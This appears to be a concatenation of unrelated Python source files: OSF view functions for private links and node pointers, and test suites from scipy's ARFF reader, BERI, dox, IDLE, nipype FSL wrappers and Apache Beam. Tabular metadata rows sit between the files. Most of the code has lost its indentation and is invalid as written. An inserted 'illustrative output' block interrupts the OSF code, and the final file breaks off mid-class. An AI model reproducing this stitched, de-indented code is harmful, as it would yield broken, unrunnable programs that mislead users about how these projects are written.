def project_generate_private_link_post(auth, node, **kwargs):
""" creata a new private link object and add it to the node and its selected children"""
node_ids = request.json.get('node_ids', [])
name = request.json.get('name', '')
anonymous = request.json.get('anonymous', False)
if node._id not in node_ids:
node_ids.insert(0, node._id)
nodes = [AbstractNode.load(node_id) for node_id in node_ids]
try:
new_link = new_private_link(
name=name, user=auth.user, nodes=nodes, anonymous=anonymous
)
except ValidationError as e:
raise HTTPError(
http_status.HTTP_400_BAD_REQUEST,
data=dict(message_long=str(e))
)
return new_link
@must_be_valid_project
@must_have_permission(ADMIN)
def project_private_link_edit(auth, **kwargs):
name = request.json.get('value', '')
try:
validate_title(name)
except ValidationError as e:
message = 'Invalid link name.' if e.message == 'Invalid title.' else e.message
raise HTTPError(
http_status.HTTP_400_BAD_REQUEST,
data=dict(message_long=message)
)
private_link_id = request.json.get('pk', '')
private_link = PrivateLink.load(private_link_id)
if private_link:
new_name = strip_html(name)
private_link.name = new_name
private_link.save()
return new_name
else:
raise HTTPError(
http_status.HTTP_400_BAD_REQUEST,
data=dict(message_long='View-only link not found.')
)
def _serialize_node_search(node):
"""Serialize a node for use in pointer search.
:param Node node: Node to serialize
:return: Dictionary of node data
"""
data = {
'id': node._id,
'title': node.title,
'etal': len(node.visible_contributors) > 1,
'isRegistration': node.is_registration
}
if node.is_registration:
data['title'] += ' (registration)'
data['dateRegistered'] = node.registered_date.isoformat()
else:
data['dateCreated'] = node.created.isoformat()
data['dateModified'] = node.modified.isoformat()
first_author = node.visible_contributors[0]
data['firstAuthor'] = first_author.family_name or first_author.given_name or first_author.fullname
return data
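# --- Illustrative output (added; not part of the OSF codebase) ---
# A hedged sketch of the dict _serialize_node_search() produces for a
# hypothetical registration; all values below are made up.
_EXAMPLE_NODE_SEARCH_RESULT = {
    'id': 'abc12',
    'title': 'Example Study (registration)',
    'etal': False,
    'isRegistration': True,
    'dateRegistered': '2015-01-01T00:00:00',
    'firstAuthor': 'Smith',
}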
@must_be_logged_in
def search_node(auth, **kwargs):
"""
"""
# Get arguments
node = AbstractNode.load(request.json.get('nodeId'))
include_public = request.json.get('includePublic')
size = float(request.json.get('size', '5').strip())
page = request.json.get('page', 0)
query = request.json.get('query', '').strip()
start = (page * size)
if not query:
return {'nodes': []}
# Exclude current node from query if provided
nin = [node.id] + list(node._nodes.values_list('pk', flat=True)) if node else []
can_view_query = Q(_contributors=auth.user)
if include_public:
can_view_query = can_view_query | Q(is_public=True)
nodes = (AbstractNode.objects
.filter(
can_view_query,
title__icontains=query,
is_deleted=False)
.exclude(id__in=nin)
.exclude(type='osf.collection')
.exclude(type='osf.quickfilesnode'))
count = nodes.count()
pages = math.ceil(count / size)
validate_page_num(page, pages)
return {
'nodes': [
_serialize_node_search(each)
for each in nodes[start: start + size]
if each.contributors
],
'total': count,
'pages': pages,
'page': page
}
def _add_pointers(node, pointers, auth):
"""
:param Node node: Node to which pointers will be added
:param list pointers: Nodes to add as pointers
"""
added = False
for pointer in pointers:
if isinstance(node, Collection):
node.collect_object(pointer, auth.user)
else:
node.add_pointer(pointer, auth, save=False)
added = True
if added:
node.save()
@collect_auth
def add_pointer(auth):
"""Add a single pointer to a node using only JSON parameters
"""
to_node_id = request.json.get('toNodeID')
pointer_to_move = request.json.get('pointerID')
if not (to_node_id and pointer_to_move):
raise HTTPError(http_status.HTTP_400_BAD_REQUEST)
pointer = AbstractNode.load(pointer_to_move)
to_node = Guid.load(to_node_id).referent
try:
_add_pointers(to_node, [pointer], auth)
except ValueError:
raise HTTPError(http_status.HTTP_400_BAD_REQUEST)
@must_have_permission(WRITE)
@must_not_be_registration
def add_pointers(auth, node, **kwargs):
"""Add pointers to a node.
"""
node_ids = request.json.get('nodeIds')
if not node_ids:
raise HTTPError(http_status.HTTP_400_BAD_REQUEST)
nodes = [
AbstractNode.load(node_id)
for node_id in node_ids
]
try:
_add_pointers(node, nodes, auth)
except ValueError:
raise HTTPError(http_status.HTTP_400_BAD_REQUEST)
return {}
@must_have_permission(WRITE)
@must_not_be_registration
def remove_pointer(auth, node, **kwargs):
"""Remove a pointer from a node, raising a 400 if the pointer is not
in `node.nodes`.
"""
# TODO: since this is a delete request, we shouldn't use the request body; put the pointer
# id in the URL instead
pointer_id = request.json.get('pointerId')
if pointer_id is None:
raise HTTPError(http_status.HTTP_400_BAD_REQUEST)
pointer = AbstractNode.load(pointer_id)
if pointer is None:
raise HTTPError(http_status.HTTP_400_BAD_REQUEST)
try:
node.rm_pointer(pointer, auth=auth)
except ValueError:
raise HTTPError(http_status.HTTP_400_BAD_REQUEST)
node.save()
@must_have_permission(WRITE)
@must_not_be_registration
def fork_pointer(auth, node, **kwargs):
"""Fork a pointer. Raises BAD_REQUEST if pointer not provided, not found,
or not present in `nodes`.
:param Auth auth: Consolidated authorization
:param Node node: node containing the node link (pointer) to fork
:return: Fork of the node that the node link (pointer) points to
"""
NodeRelation = apps.get_model('osf.NodeRelation')
linked_node_id = request.json.get('nodeId')
linked_node = AbstractNode.load(linked_node_id)
pointer = NodeRelation.objects.filter(child=linked_node, is_node_link=True, parent=node).first()
if pointer is None:
# TODO: Change this to 404?
raise HTTPError(http_status.HTTP_400_BAD_REQUEST)
try:
fork = node.fork_pointer(pointer, auth=auth, save=True)
except ValueError:
raise HTTPError(http_status.HTTP_400_BAD_REQUEST)
return {
'data': {
'node': serialize_node_summary(node=fork, auth=auth, show_path=False)
}
}, http_status.HTTP_201_CREATED
def abbrev_authors(node):
lead_author = node.visible_contributors[0]
ret = lead_author.family_name or lead_author.given_name or lead_author.fullname
if node.visible_contributors.count() > 1:
ret += ' et al.'
return ret
def serialize_pointer(node, auth):
if node.can_view(auth):
return {
'id': node._id,
'url': node.url,
'title': node.title,
'authorShort': abbrev_authors(node),
}
return {
'url': None,
'title': 'Private Component',
'authorShort': 'Private Author(s)',
}
@must_be_contributor_or_public
def get_pointed(auth, node, **kwargs):
"""View that returns the pointers for a project."""
NodeRelation = apps.get_model('osf.NodeRelation')
return {'pointed': [
serialize_pointer(each.parent, auth)
for each in NodeRelation.objects.filter(child=node, is_node_link=True)
]}
| apache-2.0 | 8,229,932,712,436,812,000 | 35.87617 | 180 | 0.624744 | false |
vberaudi/scipy | scipy/io/arff/tests/test_arffread.py | 27 | 7727 | #!/usr/bin/env python
from __future__ import division, print_function, absolute_import
import datetime
import os
import sys
from os.path import join as pjoin
if sys.version_info[0] >= 3:
from io import StringIO
else:
from cStringIO import StringIO
import numpy as np
from numpy.testing import (TestCase, assert_array_almost_equal, assert_array_equal, assert_equal,
assert_, assert_raises, dec, run_module_suite)
from scipy.io.arff.arffread import loadarff
from scipy.io.arff.arffread import read_header, parse_type, ParseArffError
from scipy._lib._version import NumpyVersion
data_path = pjoin(os.path.dirname(__file__), 'data')
test1 = os.path.join(data_path, 'test1.arff')
test2 = os.path.join(data_path, 'test2.arff')
test3 = os.path.join(data_path, 'test3.arff')
test4 = pjoin(data_path, 'test4.arff')
test5 = pjoin(data_path, 'test5.arff')
test6 = pjoin(data_path, 'test6.arff')
test7 = pjoin(data_path, 'test7.arff')
test8 = pjoin(data_path, 'test8.arff')
expect4_data = [(0.1, 0.2, 0.3, 0.4, 'class1'),
(-0.1, -0.2, -0.3, -0.4, 'class2'),
(1, 2, 3, 4, 'class3')]
expected_types = ['numeric', 'numeric', 'numeric', 'numeric', 'nominal']
missing = pjoin(data_path, 'missing.arff')
expect_missing_raw = np.array([[1, 5], [2, 4], [np.nan, np.nan]])
expect_missing = np.empty(3, [('yop', float), ('yap', float)])
expect_missing['yop'] = expect_missing_raw[:, 0]
expect_missing['yap'] = expect_missing_raw[:, 1]
class DataTest(TestCase):
def test1(self):
# Parsing trivial file with nothing.
self._test(test4)
def test2(self):
# Parsing trivial file with some comments in the data section.
self._test(test5)
def test3(self):
# Parsing trivial file with nominal attribute of 1 character.
self._test(test6)
def _test(self, test_file):
data, meta = loadarff(test_file)
for i in range(len(data)):
for j in range(4):
assert_array_almost_equal(expect4_data[i][j], data[i][j])
assert_equal(meta.types(), expected_types)
def test_filelike(self):
# Test reading from file-like object (StringIO)
f1 = open(test1)
data1, meta1 = loadarff(f1)
f1.close()
f2 = open(test1)
data2, meta2 = loadarff(StringIO(f2.read()))
f2.close()
assert_(data1 == data2)
assert_(repr(meta1) == repr(meta2))
class MissingDataTest(TestCase):
def test_missing(self):
data, meta = loadarff(missing)
for i in ['yop', 'yap']:
assert_array_almost_equal(data[i], expect_missing[i])
class HeaderTest(TestCase):
def test_type_parsing(self):
# Test parsing type of attribute from their value.
ofile = open(test2)
rel, attrs = read_header(ofile)
ofile.close()
expected = ['numeric', 'numeric', 'numeric', 'numeric', 'numeric',
'numeric', 'string', 'string', 'nominal', 'nominal']
for i in range(len(attrs)):
assert_(parse_type(attrs[i][1]) == expected[i])
def test_badtype_parsing(self):
# Test parsing wrong type of attribute from their value.
ofile = open(test3)
rel, attrs = read_header(ofile)
ofile.close()
for name, value in attrs:
assert_raises(ParseArffError, parse_type, value)
def test_fullheader1(self):
# Parsing trivial header with nothing.
ofile = open(test1)
rel, attrs = read_header(ofile)
ofile.close()
# Test relation
assert_(rel == 'test1')
# Test numerical attributes
assert_(len(attrs) == 5)
for i in range(4):
assert_(attrs[i][0] == 'attr%d' % i)
assert_(attrs[i][1] == 'REAL')
# Test nominal attribute
assert_(attrs[4][0] == 'class')
assert_(attrs[4][1] == '{class0, class1, class2, class3}')
def test_dateheader(self):
ofile = open(test7)
rel, attrs = read_header(ofile)
ofile.close()
assert_(rel == 'test7')
assert_(len(attrs) == 5)
assert_(attrs[0][0] == 'attr_year')
assert_(attrs[0][1] == 'DATE yyyy')
assert_(attrs[1][0] == 'attr_month')
assert_(attrs[1][1] == 'DATE yyyy-MM')
assert_(attrs[2][0] == 'attr_date')
assert_(attrs[2][1] == 'DATE yyyy-MM-dd')
assert_(attrs[3][0] == 'attr_datetime_local')
assert_(attrs[3][1] == 'DATE "yyyy-MM-dd HH:mm"')
assert_(attrs[4][0] == 'attr_datetime_missing')
assert_(attrs[4][1] == 'DATE "yyyy-MM-dd HH:mm"')
def test_dateheader_unsupported(self):
ofile = open(test8)
rel, attrs = read_header(ofile)
ofile.close()
assert_(rel == 'test8')
assert_(len(attrs) == 2)
assert_(attrs[0][0] == 'attr_datetime_utc')
assert_(attrs[0][1] == 'DATE "yyyy-MM-dd HH:mm Z"')
assert_(attrs[1][0] == 'attr_datetime_full')
assert_(attrs[1][1] == 'DATE "yy-MM-dd HH:mm:ss z"')
class DateAttributeTest(TestCase):
@dec.skipif(NumpyVersion(np.__version__) < '1.7.0', "No np.datetime64 in Numpy < 1.7.0")
def setUp(self):
self.data, self.meta = loadarff(test7)
@dec.skipif(NumpyVersion(np.__version__) < '1.7.0', "No np.datetime64 in Numpy < 1.7.0")
def test_year_attribute(self):
expected = np.array([
'1999',
'2004',
'1817',
'2100',
'2013',
'1631'
], dtype='datetime64[Y]')
assert_array_equal(self.data["attr_year"], expected)
@dec.skipif(NumpyVersion(np.__version__) < '1.7.0', "No np.datetime64 in Numpy < 1.7.0")
def test_month_attribute(self):
expected = np.array([
'1999-01',
'2004-12',
'1817-04',
'2100-09',
'2013-11',
'1631-10'
], dtype='datetime64[M]')
assert_array_equal(self.data["attr_month"], expected)
@dec.skipif(NumpyVersion(np.__version__) < '1.7.0', "No np.datetime64 in Numpy < 1.7.0")
def test_date_attribute(self):
expected = np.array([
'1999-01-31',
'2004-12-01',
'1817-04-28',
'2100-09-10',
'2013-11-30',
'1631-10-15'
], dtype='datetime64[D]')
assert_array_equal(self.data["attr_date"], expected)
@dec.skipif(NumpyVersion(np.__version__) < '1.7.0', "No np.datetime64 in Numpy < 1.7.0")
def test_datetime_local_attribute(self):
expected = np.array([
datetime.datetime(year=1999, month=1, day=31, hour=0, minute=1),
datetime.datetime(year=2004, month=12, day=1, hour=23, minute=59),
datetime.datetime(year=1817, month=4, day=28, hour=13, minute=0),
datetime.datetime(year=2100, month=9, day=10, hour=12, minute=0),
datetime.datetime(year=2013, month=11, day=30, hour=4, minute=55),
datetime.datetime(year=1631, month=10, day=15, hour=20, minute=4)
], dtype='datetime64[m]')
assert_array_equal(self.data["attr_datetime_local"], expected)
@dec.skipif(NumpyVersion(np.__version__) < '1.7.0', "No np.datetime64 in Numpy < 1.7.0")
def test_datetime_missing(self):
expected = np.array([
'nat',
'2004-12-01T23:59Z',
'nat',
'nat',
'2013-11-30T04:55Z',
'1631-10-15T20:04Z'
], dtype='datetime64[m]')
assert_array_equal(self.data["attr_datetime_missing"], expected)
def test_datetime_timezone(self):
assert_raises(ValueError, loadarff, test8)
if __name__ == "__main__":
run_module_suite()
| bsd-3-clause | 5,890,949,724,965,335,000 | 31.195833 | 97 | 0.57215 | false |
8l/beri | cheritest/trunk/tests/cp2/test_cp2_ctoptr_tag.py | 2 | 1520 | #-
# Copyright (c) 2014 Michael Roe
# All rights reserved.
#
# This software was developed by SRI International and the University of
# Cambridge Computer Laboratory under DARPA/AFRL contract FA8750-10-C-0237
# ("CTSRD"), as part of the DARPA CRASH research programme.
#
# @BERI_LICENSE_HEADER_START@
#
# Licensed to BERI Open Systems C.I.C. (BERI) under one or more contributor
# license agreements. See the NOTICE file distributed with this work for
# additional information regarding copyright ownership. BERI licenses this
# file to you under the BERI Hardware-Software License, Version 1.0 (the
# "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at:
#
# http://www.beri-open-systems.org/legal/license-1-0.txt
#
# Unless required by applicable law or agreed to in writing, Work distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
# @BERI_LICENSE_HEADER_END@
#
from beritest_tools import BaseBERITestCase
from nose.plugins.attrib import attr
class test_cp2_ctoptr_tag(BaseBERITestCase):
@attr('capabilities')
def test_cp2_ctoptr_tag_1(self):
'''Check that ctoptr of a capability with the tag bit unset returns 0'''
self.assertRegisterEqual(self.MIPS.a0, 0, "ctoptr of a capability with the tag bit unset did not return 0")
| apache-2.0 | -6,454,877,715,328,081,000 | 41.222222 | 115 | 0.755921 | false |
coolsvap/dox | dox/tests/test_images.py | 1 | 3848 | # -*- coding: utf-8 -*-
# Copyright (c) 2014 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
test_images
--------------
Tests for `dox.images` module.
"""
import fixtures
import testscenarios
from dox import images
from dox.tests import base
def get_fake_image(value):
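    # Build a replacement get_images() method: it returns the supplied list,
    # or ['ubuntu'] when value is None.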
if value is not None:
def fake_value(self):
return value
else:
def fake_value(self):
return ['ubuntu']
return fake_value
class TestImages(base.TestCase):
scenarios = [
('have_dockerfile', dict(
dockerfile=True, tox_ini=False, dox_yaml=False,
tox_value=[], dox_value=[], images=[])),
('no_dockerfile', dict(
dockerfile=False, tox_ini=False, dox_yaml=False,
tox_value=[], dox_value=[], images=['ubuntu'])),
('tox_no_docker', dict(
dockerfile=False, tox_ini=True, dox_yaml=False,
tox_value=[], dox_value=[], images=['ubuntu'])),
('tox_docker', dict(
dockerfile=False, tox_ini=True, dox_yaml=False,
tox_value=['tox_docker'], dox_value=[], images=['tox_docker'])),
('dox_image', dict(
dockerfile=False, tox_ini=False, dox_yaml=True,
tox_value=[], dox_value=[], images=['ubuntu'])),
('dox_no_image', dict(
dockerfile=False, tox_ini=False, dox_yaml=True,
tox_value=[], dox_value=['dox_value'], images=['dox_value'])),
('both_dox_wins', dict(
dockerfile=False, tox_ini=True, dox_yaml=True,
tox_value=['tox_wins'], dox_value=['dox_wins'],
images=['dox_wins'])),
('both_no_dox', dict(
dockerfile=False, tox_ini=True, dox_yaml=True,
tox_value=['tox_wins'], dox_value=[], images=['ubuntu'])),
('both_dockerfile_passthru', dict(
dockerfile=True, tox_ini=True, dox_yaml=True,
tox_value=[], dox_value=[], images=[])),
('all_dockerfile_dox_override', dict(
dockerfile=True, tox_ini=True, dox_yaml=True,
tox_value=[], dox_value=['dox_wins'], images=['dox_wins'])),
('all_dockerfile_tox_loses', dict(
dockerfile=True, tox_ini=True, dox_yaml=True,
tox_value=['tox_wins'], dox_value=[], images=[])),
]
def setUp(self):
super(TestImages, self).setUp()
self.useFixture(fixtures.MonkeyPatch(
'dox.config.dockerfile.Dockerfile.exists',
base.bool_to_fake(self.dockerfile)))
self.useFixture(fixtures.MonkeyPatch(
'dox.config.dox_yaml.DoxYaml.exists',
base.bool_to_fake(self.dox_yaml)))
self.useFixture(fixtures.MonkeyPatch(
'dox.config.tox_ini.ToxIni.exists',
base.bool_to_fake(self.tox_ini)))
self.useFixture(fixtures.MonkeyPatch(
'dox.config.dox_yaml.DoxYaml.get_images',
get_fake_image(self.dox_value)))
self.useFixture(fixtures.MonkeyPatch(
'dox.config.tox_ini.ToxIni.get_images',
get_fake_image(self.tox_value)))
def test_images(self):
image = images.get_images({})
self.assertEqual(image, self.images)
def load_tests(loader, in_tests, pattern):
return testscenarios.load_tests_apply_scenarios(loader, in_tests, pattern)
| apache-2.0 | 1,702,432,181,039,430,700 | 36 | 78 | 0.600572 | false |
Microsoft/PTVS | Python/Product/Miniconda/Miniconda3-x64/Lib/idlelib/idle_test/test_run.py | 3 | 1099 | import unittest
from unittest import mock
from test.support import captured_stderr
import idlelib.run as idlerun
class RunTest(unittest.TestCase):
def test_print_exception_unhashable(self):
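        # print_exception() must cope with exception chains whose members are
        # unhashable (defining __eq__ without __hash__ makes the class unhashable).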
class UnhashableException(Exception):
def __eq__(self, other):
return True
ex1 = UnhashableException('ex1')
ex2 = UnhashableException('ex2')
try:
raise ex2 from ex1
except UnhashableException:
try:
raise ex1
except UnhashableException:
with captured_stderr() as output:
with mock.patch.object(idlerun,
'cleanup_traceback') as ct:
ct.side_effect = lambda t, e: t
idlerun.print_exception()
tb = output.getvalue().strip().splitlines()
self.assertEqual(11, len(tb))
self.assertIn('UnhashableException: ex2', tb[3])
self.assertIn('UnhashableException: ex1', tb[10])
if __name__ == '__main__':
unittest.main(verbosity=2)
| apache-2.0 | -1,353,615,728,282,947,300 | 30.4 | 70 | 0.563239 | false |
FCP-INDI/nipype | nipype/interfaces/fsl/tests/test_utils.py | 10 | 10430 | # emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
import os
from tempfile import mkdtemp
from shutil import rmtree
import numpy as np
import nibabel as nb
from nipype.testing import (assert_equal, assert_not_equal,
assert_raises, skipif)
import nipype.interfaces.fsl.utils as fsl
from nipype.interfaces.fsl import no_fsl, Info
from .test_maths import (set_output_type, create_files_in_directory,
clean_directory)
@skipif(no_fsl)
def test_fslroi():
filelist, outdir, cwd, _ = create_files_in_directory()
roi = fsl.ExtractROI()
# make sure command gets called
yield assert_equal, roi.cmd, 'fslroi'
# test raising error with mandatory args absent
yield assert_raises, ValueError, roi.run
# .inputs based parameters setting
roi.inputs.in_file = filelist[0]
roi.inputs.roi_file = 'foo_roi.nii'
roi.inputs.t_min = 10
roi.inputs.t_size = 20
yield assert_equal, roi.cmdline, 'fslroi %s foo_roi.nii 10 20' % filelist[0]
# .run based parameter setting
roi2 = fsl.ExtractROI(in_file=filelist[0],
roi_file='foo2_roi.nii',
t_min=20, t_size=40,
x_min=3, x_size=30,
y_min=40, y_size=10,
z_min=5, z_size=20)
yield assert_equal, roi2.cmdline, \
'fslroi %s foo2_roi.nii 3 30 40 10 5 20 20 40' % filelist[0]
clean_directory(outdir, cwd)
# test arguments for opt_map
# Fslroi class doesn't have a filled opt_map{}
@skipif(no_fsl)
def test_fslmerge():
filelist, outdir, cwd, _ = create_files_in_directory()
merger = fsl.Merge()
# make sure command gets called
yield assert_equal, merger.cmd, 'fslmerge'
# test raising error with mandatory args absent
yield assert_raises, ValueError, merger.run
# .inputs based parameters setting
merger.inputs.in_files = filelist
merger.inputs.merged_file = 'foo_merged.nii'
merger.inputs.dimension = 't'
merger.inputs.output_type = 'NIFTI'
yield assert_equal, merger.cmdline, 'fslmerge -t foo_merged.nii %s' % ' '.join(filelist)
# verify that providing a tr value updates the dimension to tr
merger.inputs.tr = 2.25
yield assert_equal, merger.cmdline, 'fslmerge -tr foo_merged.nii %s %.2f' % (' '.join(filelist), 2.25)
# .run based parameter setting
merger2 = fsl.Merge(in_files=filelist,
merged_file='foo_merged.nii',
dimension='t',
output_type='NIFTI',
tr=2.25)
yield assert_equal, merger2.cmdline, \
'fslmerge -tr foo_merged.nii %s %.2f' % (' '.join(filelist), 2.25)
clean_directory(outdir, cwd)
# test arguments for opt_map
# Fslmerge class doesn't have a filled opt_map{}
# test fslmath
@skipif(no_fsl)
def test_fslmaths():
filelist, outdir, cwd, _ = create_files_in_directory()
math = fsl.ImageMaths()
# make sure command gets called
yield assert_equal, math.cmd, 'fslmaths'
# test raising error with mandatory args absent
yield assert_raises, ValueError, math.run
# .inputs based parameters setting
math.inputs.in_file = filelist[0]
math.inputs.op_string = '-add 2.5 -mul input_volume2'
math.inputs.out_file = 'foo_math.nii'
yield assert_equal, math.cmdline, \
'fslmaths %s -add 2.5 -mul input_volume2 foo_math.nii' % filelist[0]
# .run based parameter setting
math2 = fsl.ImageMaths(in_file=filelist[0], op_string='-add 2.5',
out_file='foo2_math.nii')
yield assert_equal, math2.cmdline, 'fslmaths %s -add 2.5 foo2_math.nii' % filelist[0]
# test arguments for opt_map
# Fslmath class doesn't have opt_map{}
clean_directory(outdir, cwd)
# test overlay
@skipif(no_fsl)
def test_overlay():
filelist, outdir, cwd, _ = create_files_in_directory()
overlay = fsl.Overlay()
# make sure command gets called
yield assert_equal, overlay.cmd, 'overlay'
# test raising error with mandatory args absent
yield assert_raises, ValueError, overlay.run
# .inputs based parameters setting
overlay.inputs.stat_image = filelist[0]
overlay.inputs.stat_thresh = (2.5, 10)
overlay.inputs.background_image = filelist[1]
overlay.inputs.auto_thresh_bg = True
overlay.inputs.show_negative_stats = True
overlay.inputs.out_file = 'foo_overlay.nii'
yield assert_equal, overlay.cmdline, \
'overlay 1 0 %s -a %s 2.50 10.00 %s -2.50 -10.00 foo_overlay.nii' % (
filelist[1], filelist[0], filelist[0])
# .run based parameter setting
overlay2 = fsl.Overlay(stat_image=filelist[0], stat_thresh=(2.5, 10),
background_image=filelist[1], auto_thresh_bg=True,
out_file='foo2_overlay.nii')
yield assert_equal, overlay2.cmdline, 'overlay 1 0 %s -a %s 2.50 10.00 foo2_overlay.nii' % (
filelist[1], filelist[0])
clean_directory(outdir, cwd)
# test slicer
@skipif(no_fsl)
def test_slicer():
filelist, outdir, cwd, _ = create_files_in_directory()
slicer = fsl.Slicer()
# make sure command gets called
yield assert_equal, slicer.cmd, 'slicer'
# test raising error with mandatory args absent
yield assert_raises, ValueError, slicer.run
# .inputs based parameters setting
slicer.inputs.in_file = filelist[0]
slicer.inputs.image_edges = filelist[1]
slicer.inputs.intensity_range = (10., 20.)
slicer.inputs.all_axial = True
slicer.inputs.image_width = 750
slicer.inputs.out_file = 'foo_bar.png'
yield assert_equal, slicer.cmdline, \
'slicer %s %s -L -i 10.000 20.000 -A 750 foo_bar.png' % (
filelist[0], filelist[1])
# .run based parameter setting
slicer2 = fsl.Slicer(
in_file=filelist[0], middle_slices=True, label_slices=False,
out_file='foo_bar2.png')
yield assert_equal, slicer2.cmdline, 'slicer %s -a foo_bar2.png' % (filelist[0])
clean_directory(outdir, cwd)
def create_parfiles():
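    # Write two 6x3 files of random motion-parameter values and return their names.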
np.savetxt('a.par', np.random.rand(6, 3))
np.savetxt('b.par', np.random.rand(6, 3))
return ['a.par', 'b.par']
# test fsl_tsplot
@skipif(no_fsl)
def test_plottimeseries():
filelist, outdir, cwd, _ = create_files_in_directory()
parfiles = create_parfiles()
plotter = fsl.PlotTimeSeries()
# make sure command gets called
yield assert_equal, plotter.cmd, 'fsl_tsplot'
# test raising error with mandatory args absent
yield assert_raises, ValueError, plotter.run
# .inputs based parameters setting
plotter.inputs.in_file = parfiles[0]
plotter.inputs.labels = ['x', 'y', 'z']
plotter.inputs.y_range = (0, 1)
plotter.inputs.title = 'test plot'
plotter.inputs.out_file = 'foo.png'
yield assert_equal, plotter.cmdline, \
('fsl_tsplot -i %s -a x,y,z -o foo.png -t \'test plot\' -u 1 --ymin=0 --ymax=1'
% parfiles[0])
# .run based parameter setting
plotter2 = fsl.PlotTimeSeries(
in_file=parfiles, title='test2 plot', plot_range=(2, 5),
out_file='bar.png')
yield assert_equal, plotter2.cmdline, \
'fsl_tsplot -i %s,%s -o bar.png --start=2 --finish=5 -t \'test2 plot\' -u 1' % tuple(
parfiles)
clean_directory(outdir, cwd)
@skipif(no_fsl)
def test_plotmotionparams():
filelist, outdir, cwd, _ = create_files_in_directory()
parfiles = create_parfiles()
plotter = fsl.PlotMotionParams()
# make sure command gets called
yield assert_equal, plotter.cmd, 'fsl_tsplot'
# test raising error with mandatory args absent
yield assert_raises, ValueError, plotter.run
# .inputs based parameters setting
plotter.inputs.in_file = parfiles[0]
plotter.inputs.in_source = 'fsl'
plotter.inputs.plot_type = 'rotations'
plotter.inputs.out_file = 'foo.png'
yield assert_equal, plotter.cmdline, \
('fsl_tsplot -i %s -o foo.png -t \'MCFLIRT estimated rotations (radians)\' '
'--start=1 --finish=3 -a x,y,z' % parfiles[0])
# .run based parameter setting
plotter2 = fsl.PlotMotionParams(
in_file=parfiles[1], in_source='spm', plot_type='translations',
out_file='bar.png')
yield assert_equal, plotter2.cmdline, \
('fsl_tsplot -i %s -o bar.png -t \'Realign estimated translations (mm)\' '
'--start=1 --finish=3 -a x,y,z' % parfiles[1])
clean_directory(outdir, cwd)
@skipif(no_fsl)
def test_convertxfm():
filelist, outdir, cwd, _ = create_files_in_directory()
cvt = fsl.ConvertXFM()
# make sure command gets called
yield assert_equal, cvt.cmd, "convert_xfm"
# test raising error with mandatory args absent
yield assert_raises, ValueError, cvt.run
# .inputs based parameters setting
cvt.inputs.in_file = filelist[0]
cvt.inputs.invert_xfm = True
cvt.inputs.out_file = "foo.mat"
yield assert_equal, cvt.cmdline, 'convert_xfm -omat foo.mat -inverse %s' % filelist[0]
# constructor based parameter setting
cvt2 = fsl.ConvertXFM(
in_file=filelist[0], in_file2=filelist[1], concat_xfm=True,
out_file="bar.mat")
yield assert_equal, cvt2.cmdline, \
"convert_xfm -omat bar.mat -concat %s %s" % (filelist[1], filelist[0])
clean_directory(outdir, cwd)
@skipif(no_fsl)
def test_swapdims(fsl_output_type=None):
prev_type = set_output_type(fsl_output_type)
files, testdir, origdir, out_ext = create_files_in_directory()
swap = fsl.SwapDimensions()
# Test the underlying command
yield assert_equal, swap.cmd, "fslswapdim"
# Test mandatory args
args = [dict(in_file=files[0]), dict(new_dims=("x", "y", "z"))]
for arg in args:
wontrun = fsl.SwapDimensions(**arg)
yield assert_raises, ValueError, wontrun.run
# Now test a basic command line
swap.inputs.in_file = files[0]
swap.inputs.new_dims = ("x", "y", "z")
yield assert_equal, swap.cmdline, "fslswapdim a.nii x y z %s" % os.path.realpath(os.path.join(testdir, "a_newdims%s" % out_ext))
# Test that we can set an output name
swap.inputs.out_file = "b.nii"
yield assert_equal, swap.cmdline, "fslswapdim a.nii x y z b.nii"
# Clean up
clean_directory(testdir, origdir)
set_output_type(prev_type)
| bsd-3-clause | 3,577,388,417,943,147,000 | 32.006329 | 132 | 0.63768 | false |
mozilla/verbatim | local_apps/pootle_project/urls.py | 6 | 1178 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2008 Zuza Software Foundation
#
# This file is part of translate.
#
# translate is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# translate is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with translate; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
from django.conf.urls.defaults import *
urlpatterns = patterns('pootle_project.views',
(r'^$|^index.html$', 'projects_index'),
(r'^(?P<project_code>[^/]*)/admin.html$', 'project_admin'),
(r'^(?P<project_code>[^/]*)/permissions.html$', 'project_admin_permissions'),
(r'^(?P<project_code>[^/]*)(/|/index.html)?$', 'project_language_index'),
)
| gpl-2.0 | 5,109,115,047,068,025,000 | 39.62069 | 81 | 0.709677 | false |
amarouni/incubator-beam | sdks/python/apache_beam/transforms/sideinputs_test.py | 9 | 11625 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Unit tests for side inputs."""
import logging
import unittest
from nose.plugins.attrib import attr
import apache_beam as beam
from apache_beam.testing.test_pipeline import TestPipeline
from apache_beam.testing.util import assert_that, equal_to
from apache_beam.transforms import window
class SideInputsTest(unittest.TestCase):
# Enable nose tests running in parallel
